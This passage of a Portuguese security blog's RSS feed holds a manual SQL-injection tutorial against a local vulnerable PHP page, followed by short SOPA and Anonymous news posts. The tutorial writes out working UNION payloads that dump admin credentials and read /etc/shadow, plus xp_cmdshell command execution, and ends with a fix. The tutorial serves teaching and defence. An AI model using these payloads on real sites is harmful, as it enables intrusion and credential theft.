Hoje em dia qualquer programador, por mais iniciante que possa ser, coloca no mínimo um addslashes em sua página. Além disso, é muito difícil nos dias de hoje você ler o erro vindo direto do servidor SQL (por exemplo, mysql_error()). Outro ponto importante é que eu buscava todos os dados de uma vez. O limite de um dado por vez é dispensado pelo DVWA, mas é sempre necessário em outros sistemas. Não só a página remota, como também sua conexão.</p>
<p><span id="more-3158"></span></p>
<p>Tudo bem, então vamos iniciar.<br />
Vamos criar nosso próprio ambiente de teste localmente. Para tanto, teremos um script em PHP que eu salvei como noticia.php, que será o responsável por obter a notícia na base de dados e exibí-la, e um banco de dados. Nossa missão é capturar as senhas.<br />
Crie a base de dados no PHPMyAdmin, Adminer ou o seu gerenciador SQL predileto. Feito isso, rode a query:</p>
<pre class="brush: sql; title: ;">
SET NAMES utf8;
SET foreign_key_checks = 0;
SET time_zone = 'SYSTEM';
SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';

CREATE TABLE `admin` (
  `login` varchar(255) NOT NULL,
  `senha` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

INSERT INTO `admin` (`login`, `senha`) VALUES
('joao',        '21232f297a57a5a743894a0e4a801fc3'),
('maria',       '49f8aa089b957fe92343d08032b3b436');

CREATE TABLE `noticias` (
  `id` int(11) NOT NULL,
  `titulo` varchar(255) NOT NULL,
  `texto` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

INSERT INTO `noticias` (`id`, `titulo`, `texto`) VALUES
(1,     'Lorem ipsum dolor sit amet',   'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas volutpat elit ut dolor feugiat sit amet dapibus velit sodales. Nunc posuere, mi eu euismod posuere, risus dui dictum est, id iaculis mi erat a diam. Quisque eget ante at magna aliquam consectetur et id felis. Donec accumsan dapibus mi id facilisis. Maecenas at mauris erat. Nunc consectetur nulla id nisl fringilla at eleifend urna volutpat. Sed pellentesque ligula sit amet magna molestie vitae iaculis risus accumsan. Morbi eget mattis nibh. Morbi tortor risus, adipiscing quis auctor at, pulvinar quis dolor.\n\nMorbi ac tempor turpis. Nulla sit amet lectus enim, eget aliquet lorem. Aliquam sit amet nunc in sem tempor rhoncus id ut odio. Morbi condimentum ipsum in urna tempus dapibus. Duis a eleifend dui. Sed condimentum semper blandit. Praesent in justo eget lorem tempus tincidunt vel non tortor. Aliquam quis dictum orci. Nulla dictum lobortis posuere. Donec eleifend cursus orci eu fringilla. Donec volutpat elit eget nibh egestas quis pharetra enim dictum. Nam tortor orci, suscipit at aliquam sed, blandit vitae odio.\n\nCurabitur rhoncus nisi blandit elit fringilla vitae varius nulla sollicitudin. Pellentesque elementum, ante sed bibendum ornare, sapien quam pellentesque lectus, vitae aliquam libero libero sit amet mi. Praesent tellus tortor, volutpat at placerat non, fringilla a nunc. Nulla laoreet lacinia justo, in gravida tellus ultricies sit amet. Nulla pulvinar tortor condimentum leo cursus eleifend. Curabitur faucibus leo in magna varius at lobortis purus vulputate. Praesent venenatis leo et lorem egestas bibendum varius magna facilisis. Nam id urna elit, vitae sagittis augue. Ut non elit vel nisl rutrum elementum a a risus. Integer id nibh ut magna scelerisque vehicula. Donec sit amet odio sed magna suscipit dapibus eget vel tellus. Proin lacinia ipsum at diam placerat iaculis. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Quisque suscipit ultricies sollicitudin. Nullam nec sodales nisl. Donec vehicula odio a nisl posuere id vestibulum libero congue.\n\nNam non velit diam. Pellentesque consequat accumsan venenatis. Cras egestas rhoncus luctus. Ut eu nibh urna, ac pharetra nisi. Maecenas dapibus laoreet augue, eget placerat lectus blandit a. Integer semper accumsan velit vel rutrum. Proin commodo pharetra justo, id rhoncus sem mattis sed. Nullam adipiscing hendrerit faucibus. Nullam fermentum pharetra massa gravida congue. Integer at tortor non lectus accumsan lobortis. Aliquam blandit egestas vestibulum. Suspendisse tincidunt cursus arcu.\n\nNulla est neque, feugiat aliquam malesuada eu, consequat in velit. Praesent et nunc erat. Nunc lacus ipsum, bibendum at dignissim ac, posuere sed metus. Curabitur facilisis magna nec tellus sollicitudin vel cursus mauris ullamcorper. Sed neque libero, commodo et vehicula et, venenatis eget odio. Pellentesque scelerisque orci in ligula sollicitudin eu fermentum diam placerat. Duis malesuada condimentum massa, a luctus risus euismod in. Nunc risus ante, lacinia volutpat adipiscing sed, venenatis at nisl. Sed vestibulum fermentum libero, at tristique odio adipiscing vitae.'),
(2,     'Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit',  'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse nibh purus, hendrerit non sagittis eget, ultricies sed mi. Suspendisse in imperdiet odio. Morbi malesuada mattis semper. Aenean non nibh dui. Quisque rutrum condimentum nunc, et placerat justo vulputate vel. Proin tempor mattis lacus, convallis auctor mauris auctor id. Vestibulum nisi lectus, feugiat sit amet ullamcorper eu, auctor sed velit. Praesent aliquam mollis libero, eu tincidunt libero malesuada sed. Maecenas accumsan urna urna. Nulla turpis orci, suscipit nec euismod vitae, feugiat a massa. Aliquam non sem eget sem condimentum ullamcorper. Donec augue leo, auctor imperdiet faucibus ut, imperdiet eu nulla. Donec et quam neque. Nunc sagittis egestas convallis. Duis in sem porttitor dui dictum facilisis eget sed risus. Quisque ultricies justo id leo auctor vehicula lobortis ligula posuere.\n\nPraesent enim lacus, posuere quis rhoncus vel, tempus non nunc. Cras euismod mattis diam ac tempor. Mauris id orci arcu. Fusce eleifend feugiat est ut porttitor. Curabitur id erat sit amet tortor rutrum tempus sed eget enim. Sed fringilla viverra eros sed commodo. Quisque purus turpis, tincidunt vitae feugiat in, sagittis eu dolor. Praesent malesuada consequat tortor. Aliquam sed ante urna, ac mollis metus. Etiam at pretium enim.\n\nFusce euismod mattis ligula, eu rutrum erat blandit eget. Praesent non varius libero. Maecenas viverra elit sed neque aliquam a tincidunt risus eleifend. Curabitur tincidunt, arcu quis congue faucibus, nunc justo tincidunt risus, eu suscipit turpis urna non erat. Morbi mattis condimentum mauris ac tempus. Morbi vulputate dui non eros pulvinar tempus. Morbi fringilla ornare mauris, eu bibendum diam feugiat tincidunt. Donec euismod, urna sed lacinia volutpat, nisi velit cursus odio, quis fermentum sem lectus eget mauris. Mauris condimentum scelerisque vehicula. Duis sed enim lacus. Suspendisse potenti. Morbi suscipit lobortis convallis. Nunc sem libero, sollicitudin venenatis eleifend quis, euismod in justo. Nunc sodales mollis vulputate. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\n\nNunc ac est urna. Sed mollis ipsum in orci dapibus eu pharetra dui eleifend. Quisque quis ligula mauris, eget bibendum magna. Pellentesque non urna augue, in vulputate augue. Integer eleifend accumsan sem quis facilisis. Aenean eleifend mi sed augue imperdiet sed fermentum nisl sodales. Aenean hendrerit ante ut nunc dignissim scelerisque. Integer vel mollis nunc.\n\nDonec eu est vitae quam tincidunt feugiat eu sit amet libero. In a consequat nisl. Sed sit amet nibh sit amet leo bibendum condimentum vestibulum eget leo. Donec id sagittis mauris. Vivamus massa metus, ullamcorper sit amet scelerisque ut, adipiscing a lectus. Maecenas volutpat lectus a est eleifend iaculis. Etiam arcu tellus, luctus luctus venenatis et, facilisis suscipit est. Ut convallis ornare erat tincidunt viverra. Pellentesque non massa sed turpis hendrerit ultrices. In neque orci, malesuada interdum tincidunt at, posuere eu justo. Aenean in dapibus ante. Ut tincidunt luctus ante at imperdiet. Vestibulum ultrices ullamcorper feugiat. Nulla facilisi.');
</pre>
<p>Isto irá criar duas tabelas na base. Na primeira tabela, são inseridas duas notícias (textos Lorem Ipsum), e na segunda, são inseridos login e senha &#8211; criptografada em MD5 &#8211; de dois usuários. Mas nós não sabemos disso.<br />
(Repetindo) Nossa missão: Obter os dados administrativos.<br />
Para isso, imagine que este é a página de notícias do website alvo. Salve este script como noticia.php no seu servidor local e rode-o pelo navegador.</p>
<pre class="brush: php; title: ;">
&lt;?php
$server = 'localhost'; // configure aqui
$login = 'root'; // configure aqui
$senha = '1708'; // configure aqui
$servidor = 'sqli'; // configure aqui

mysql_connect($server, $login, $senha) or die(mysql_error());
mysql_select_db($servidor) or die(mysql_error());

$id = mysql_real_escape_string($_GET['id']);
$id = addslashes($id);

$qry = mysql_query(&quot;SELECT * FROM noticias WHERE id=$id&quot;);
while($row = mysql_fetch_array($qry)) {
  $titulo = $row['titulo'];
  $texto = $row['texto'];
}
mysql_close();
?&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;&lt;?php echo $titulo; ?&gt;&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;b&gt;&lt;?php echo $titulo; ?&gt;&lt;/b&gt;&lt;br&gt;
&lt;?php echo $texto; ?&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre>
<p>Rode este script em localhost, lembrando de configurar o princípio do mesmo. Note que eu utilizei as duas funções que estão sendo postas à prova, juntas. Estas funções prometem proteger o website contra SQLi. Toda esta proteção vai falhar. Duvida?<br />
Então vamos lá. Primeiro, vamos acessar normalmente as notícias 1 e 2:</p>
<p>* noticia.php?id=1<br />
* noticia.php?id=2</p>
<p>Agora, vamos inserir uma aspa na URL, de forma a causar o erro e confirmar a vulnerabilidade:</p>
<p>* noticia.php?id=&#8217;1</p>
<p>Tudo ok? Erro aparecendo:</p>
<pre class="brush: php; title: ;">
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/noticia.php on line 14
</pre>
<p>Então realmente houve um erro. Agora vamos utilizar o ORDER BY para identificar o número de colunas existente na tabela atual. Iremos também utilizar &#8211;+ para comentar e inutilizar o restante da query, se houver.</p>
<p>* noticia.php?id=1 order by 1&#8211;+<br />
* noticia.php?id=1 order by 2&#8211;+<br />
* noticia.php?id=1 order by 3&#8211;+<br />
* noticia.php?id=1 order by 4&#8211;+</p>
<p>Note que nos 3 primeiros testes, a notícia é exibida corretamente. Já no último, houve um erro. Isto indica que a coluna #4 não existe. Sendo assim, temos 3 colunas na tabela atual. Você pode verificar isso no seu gerenciador SQL, se quiser.<br />
Agora vamos utilizar o UNION ALL para identificar para onde vai o conteúdo de cada coluna. Antes disso, repare que negativamos o número 1 (ID da notícia), para que a mesma não seja trazida do banco de dados, e o ataque fique mais rápido.</p>
<p>* noticia.php?id=-1 union all select 1,2,3&#8211;+</p>
<p>Há vários casos em que isto não dá certo, mesmo que haja 3 colunas na base atual. Isto porque o programador pode selecionar dados de 2 colunas diferentes ou até mesmo não selecionar todas as colunas da tabela atual. Neste caso, basta ir tentando diferentes números até conseguir.<br />
Note que a coluna 1 não retorna dados. É porque ela é a identificação da notícia, usada na condição WHERE, certo? As colunas 2 e 3 contém, respectivamente, o título e o texto da notícia. Notamos isso pois esses números aparecem naquele local na página.<br />
Primeiramente, vamos obter alguns dados que aparecerão no lugar da coluna 3 (conteúdo da notícia). Vamos obter o nome do banco de dados atual, a versão e o usuário do mysql. Para obter 3 dados em apenas 1 campo, usamos o concat().</p>
<p>* noticia.php?id=-1 union all select 1,2,concat(user(),0x3c3d3e,database(),0x3c3d3e,ver sion())&#8211;+</p>
<p>Se a versão do MySQL for maior que 5, teremos o information_schema, que nos ajudará bastante.<br />
Agora vamos obter todos as bases de dados do servidor. Para isso, vamos usar a coluna 2 (título) e a tabela &#8216;schemata&#8217; do information_schema.</p>
<p>* noticia.php?id=-1 union all select 1,schema_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.schemata limit 0,1&#8211;+<br />
* noticia.php?id=-1 union all select 1,schema_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.schemata limit 1,1&#8211;+</p>
<p>Vamos aumentar o LIMIT de 0,1 para 1,1 2,1 3,1 4,1 até gerar erro, que indicará o fim da lista. Devemos sempre limitar os dados. O próprio Havij faz isso. Note que os dados aparecem um a um.<br />
Agora vamos obter o nome de todas as tabelas do banco de dados atual:</p>
<p>* noticia.php?id=-1 union all select 1,table_name,concat(user(),0x3c3d3e,database(),0&#215;3 c3d3e,version()) from information_schema.tables where table_schema=database() limit 0,1&#8211;+</p>
<p>Note que não estamos utilizando aspas, então o ataque é bem-sucedido. Vamos alterando o limit e note que conseguimos obter &#8220;admin&#8221; e &#8220;noticias&#8221; e um erro.<br />
Repare também que apenas substituímos o número 2, para que esses dados apareçam no lugar do mesmo na página.<br />
Agora, vamos pegar o nome de todas as colunas da tabela &#8220;admin&#8221;, que julgamos nos interessar (a base do achismo). Veja como é feito:</p>
<p>* noticia.php?id=-1 union all select 1,column_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.columns where table_name=(&#8216;admin&#8217;) and table_schema=database() limit 0,1&#8211;+</p>
<p>Mas aí temos um problema: na condição where, utilizamos aspas para indicar o nome da tabela. Nossas aspas foram escapadas e não temos como continuar, certo? Errado.<br />
O que faremos é converter o nome da tabela para hexadecimal. admin em hexa fica 0x61646d696e. Vamos ver como ficaremos:</p>
<p>* noticia.php?id=-1 union all select 1,column_name,concat(user(),0x3c3d3e,database(),0x 3c3d3e,version()) from information_schema.columns where table_name=0x61646d696e and table_schema=database() limit 0,1&#8211;+</p>
<p>Vamos alterando o limit e veja que conseguimos obter &#8220;login&#8221; e &#8220;senha&#8221;. Vamos então, enfim, obter os dados desta tabela, utilizando o concat() para pegar mais de um dado:</p>
<p>* noticia.php?id=-1 union all select 1,concat(login,0x3c3d3e,senha),concat(user(),0x3c3 d3e,database(),0x3c3d3e,version()) from sqli.admin limit 0,1</p>
<p>0x3c3d3e significa &#8221; e utilizamos estes símbolos para separar um dado do outro, para não nos confundirmos.<br />
Vá alterando o limit e veja que conseguimos obter:</p>
<pre class="brush: php; title: ;">
joao&lt;=&gt;21232f297a57a5a743894a0e4a801fc3
maria&lt;=&gt;49f8aa089b957fe92343d08032b3b436
</pre>
<p>Para terminar, vamos descriptografar essas hashs md5, utilizando o MD5Decrypter, que usa um banco de dados com várias hashes:</p>
<pre class="brush: php; title: ;">
21232f297a57a5a743894a0e4a801fc3 MD5 : admin
49f8aa089b957fe92343d08032b3b436 [Not Found]
</pre>
<p>Viu só? Utilizamos as duas funções, e estas não nos foram úteis.<br />
O que fazer então? No lugar de colocar as duas funções, neste caso, inúteis, já que receberemos apenas números, podemos fazer:</p>
<pre class="brush: php; title: ;">
$id = is_numeric($_GET['id']) ? $_GET['id'] : die();
</pre>
<p>Ou seja, se $_GET['id'] for numérico, seu valor será atribuído à variável $id. Caso contrário, o script morrerá (irá parar sua execução).</p>
<p>Simples, não?</p>
<p>Mas, &#8216;peraí&#8217;, duas coisas extras que o Havij faz e eu não mostrei (ainda):<br />
<strong>Lendo arquivos</strong><br />
É extremamente fácil ler arquivos pelo SQLi. No entanto, deve estar rodando, no servidor SQL, um usuário que tenha permissão para ler o arquivo requerido.<br />
É simples: no lugar de buscar dados do banco de dados, use a função load_file(), colocando entre os parêntesis da função, o nome do arquivo (desde a raiz) que você deseja ler. Veja um exemplo:</p>
<ul>
<li>noticia.php?id=-1 union all select 1,load_file(0x2f6574632f706173737764),3 limit 0,1&#8211;+</li>
</ul>
<p>Aqui, obtivemos o conteúdo do arquivo /etc/passwd, que guarda os usuários daquele computador (Unix). É melhor ver o conteúdo do arquivo pelo código-fonte, já que dificilmente as quebras de linha serão mostradas. Caso haja um &#8216;x&#8217; no local da senha, é aquela velha criptografia terrível. Você verá as senhas criptografadas no arquivo /etc/shadow (0x2f6574632f736861646f77).<br />
 Rodar comandos no terminal<br />
Isto só é possível em servidores Windows com Microsoft SQL Server que permite a execução de comandos. É bem simples. No lugar de obter dados da base de dados, use o comando host ou xp_cmdshell para executar o comando. Veja (rodando o comando &#8216;ls&#8217;, para ter a lista dos arquivos do diretório atual):</p>
<p>    * noticia.php?id=-1 union all select 1,xp_cmdshell 0x6c73,3 limit 0,1–+<br />
    * noticia.php?id=-1 union all select 1,host 0x6c73,3 limit 0,1–+</p>
<p>Como estou usando Linux e MySQL, este exemplo não funcionará.</p>
<p> Para terminar, perceba que, se é seu caso, não é você quem é o defacer, e sim o ItSecTeam (desenvolvedores do Havij). Quem faz o hacker não são as ferramentas, mas, sim, o conhecimento. O Havij nem sempre estará quando for necessário.</p>
<p> Até a próxima!<br />
 AUTOR: 0KaL</p>
<p><img class="aligncenter" src="http://vidadeprogramador.com.br/wp-content/uploads/2011/05/tirinha117.png" alt="" border="0" /></p>
<pre></pre>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/25/havijando-sem-havij-sqli-manual-na-pratica/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Senadores dos EUA abandonam lei antipirataria após protestos na internet</title>
		<link>http://www.inw-seguranca.com/2012/01/20/senadores-dos-eua-abandonam-lei-antipirataria-apos-protestos-na-internet/</link>
		<comments>http://www.inw-seguranca.com/2012/01/20/senadores-dos-eua-abandonam-lei-antipirataria-apos-protestos-na-internet/#comments</comments>
		<pubDate>Fri, 20 Jan 2012 18:30:16 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[abandonam]]></category>
		<category><![CDATA[PIPA]]></category>
		<category><![CDATA[Senadores]]></category>
		<category><![CDATA[SOPA]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3153</guid>
		<description><![CDATA[Um dia depois que Wikipedia, Google, Yahoo!, Facebook e outras empresas se uniram em um protesto contra a lei antipirataria dos Estados Unidos, legisladores do país abandonaram nesta quinta-feira (19) o projeto de lei de regulação da internet, informou a imprensa. De acordo com a publicação digital Ars Technica, até esta manhã pelo menos 18 senadores,]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Um dia depois que Wikipedia, Google, Yahoo!, Facebook e outras empresas se uniram em um protesto contra a lei antipirataria dos Estados Unidos, legisladores do país abandonaram nesta quinta-feira (19) o projeto de lei de regulação da internet, informou a imprensa.</p>
<p>De acordo com a publicação digital Ars Technica, até esta manhã pelo menos 18 senadores, em sua maioria republicanos e alguns deles promovedores do projeto de lei conhecido como SOPA, se afastaram da iniciativa que na quarta causou um &#8220;blecaute&#8221; na internet.<br />
<span id="more-3153"></span><br />
O canal MSNBC informou que o senador Roy Blunt, republicano do Missouri, retirou seu apoio seguindo os passos do também republicano Marco Rubio, da Flórida.</p>
<p>O projeto de lei tem o apoio da indústria do cinema e da música, com o argumento de que se busca uma proteção dos direitos autorais e de propriedade intelectual. Estas indústrias querem que o Google e outros serviços de internet bloqueiem os sites onde são distribuídos filmes, músicas e outros bens pirateados.</p>
<p>As empresas da internet sustentam que a legislação promove a censura, altera a operacionalidade da internet e prejudica sua capacidade para a inovação.</p>
<p>O governo do presidente Barack Obama expressou na semana passada sua oposição a qualquer legislação que imponha censuras à internet.</p>
<p>O fato de a maioria dos legisladores que retiraram o apoio à iniciativa serem republicanos surpreendeu bastante, já que os assuntos relacionados aos direitos autorais, tradicionalmente, são considerados um assunto livre de partidarismos.</p>
<p>Antes do protesto virtual desta quarta, a iniciativa tinha 16 apoiadores republicanos e 23 democratas. Até esta manhã já perdeu pelo menos um quarto do respaldo republicano, enquanto apenas um democrata, Ben Cardin, de Maryland, retirou seu apoio.</p>
<p>&#8220;Copyright Efe &#8211; Todos os direitos de reprodução e representação são reservados para a Agência Efe.&#8221;</p>
<p>Fonte: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://noticias.r7.com/tecnologia-e-ciencia/noticias/senadores-dos-eua-abandonam-lei-antipirataria-apos-protestos-na-internet-20120119.html"  class="http html external self" >R7</a></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/20/senadores-dos-eua-abandonam-lei-antipirataria-apos-protestos-na-internet/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A coisa ficou séria: Anonymous Oficializa Ataques</title>
		<link>http://www.inw-seguranca.com/2012/01/20/a-coisa-ficou-seria-anonymous-oficializa-ataques/</link>
		<comments>http://www.inw-seguranca.com/2012/01/20/a-coisa-ficou-seria-anonymous-oficializa-ataques/#comments</comments>
		<pubDate>Fri, 20 Jan 2012 18:11:51 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noticias]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3149</guid>
		<description><![CDATA[Em um documento postado no site Pastebin e no vídeo acima, os hackers do Anonymous oficializaram a série de ataques que fizeram na noite de hoje (19). Em resposta ao fechamento do site Megaupload, o grupo derrubou os seguintes websites: Departamento de Justiça dos EUA &#8211; justice.gov e usdoj.gov Universal Music &#8211; universalmusic.com RIAA &#8211; riaa.org MPAA]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p><iframe src="http://www.youtube.com/embed/zOGczo5T8xU" frameborder="0" width="480" height="360"></iframe></p>
<p>Em um documento postado no site <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pastebin.com/WEydcBVV"  class="http external blank"  target="_blank">Pastebin</a> e no vídeo acima, os hackers do Anonymous oficializaram a série de ataques que fizeram na noite de hoje (19). Em resposta ao fechamento do site Megaupload, o grupo derrubou os seguintes websites:</p>
<p><span id="more-3149"></span></p>
<ul>
<li>Departamento de Justiça dos EUA &#8211; justice.gov e usdoj.gov</li>
<li>Universal Music &#8211; universalmusic.com</li>
<li>RIAA &#8211; riaa.org</li>
<li>MPAA &#8211; mpaa.org</li>
<li>Orgão responsável pelos direitos autorais &#8211; copyright.com</li>
<li>HADOPI, orgão francês responsável pelos direitos autorais &#8211; hadopi.fr</li>
<li>Warner Music Group &#8211; wmg.com</li>
<li>BMI &#8211; bmi.com</li>
<li>FBI &#8211; fbi.gov</li>
</ul>
<p>Após um dia de protestos contra o SOPA, a operação do FBI para remover um dos maiores sites de compartilhamento de arquivos da web parece ter acontecido em uma péssima hora. A revolta do Anonymous não deve se resumir a isso e internautas já falam em uma “Primeira Guerra Virtual”. O que será que vem por aí?</p>
<p><strong>Fonte: Tecmundo</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/20/a-coisa-ficou-seria-anonymous-oficializa-ataques/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>STOP SOPA and PIPA</title>
		<link>http://www.inw-seguranca.com/2012/01/18/stop-sopa-and-pipa/</link>
		<comments>http://www.inw-seguranca.com/2012/01/18/stop-sopa-and-pipa/#comments</comments>
		<pubDate>Thu, 19 Jan 2012 00:38:35 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noticias]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3138</guid>
		<description><![CDATA[Olá, Caso você não saiba a internet está a ponto de se tornar algo controlado por uma ditadura. Onde fecharão sites, cortarão a internet do usuário e até o PRENDERÃO! Somos totalmente contra isso, somos contra o projeto SOPA e PIPA! Estamos com vocês Annonymous! Devemos parar isso o mais rápido possível! Compartilhe e conte]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Olá,<br />
Caso você não saiba a internet está a ponto de se tornar algo controlado por uma ditadura.<br />
Onde fecharão sites, cortarão a internet do usuário e até o PRENDERÃO!</p>
<p><span style="color: #ff0000;"><strong>Somos totalmente contra isso, somos contra o projeto SOPA e PIPA!</strong></span><br />
<iframe src="http://www.youtube.com/embed/K3ORTCseHD8" frameborder="0" width="500" height="315"></iframe></p>
<p>Estamos com vocês Annonymous!<br />
Devemos parar isso o mais rápido possível!</p>
<p>Compartilhe e conte à seus amigos,<br />
Devemos mostrar ao governo que não iremos aceitar esta censura.<br />
<strong><em><br />
Assine a petição virtual contra o SOPA e PIPA: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.avaaz.org/po/save_the_internet_action_center_b/?copy"  class="http external self" >http://www.avaaz.org/po/save_the_internet_action_center_b/?copy</a></strong></em></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/01/18/stop-sopa-and-pipa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

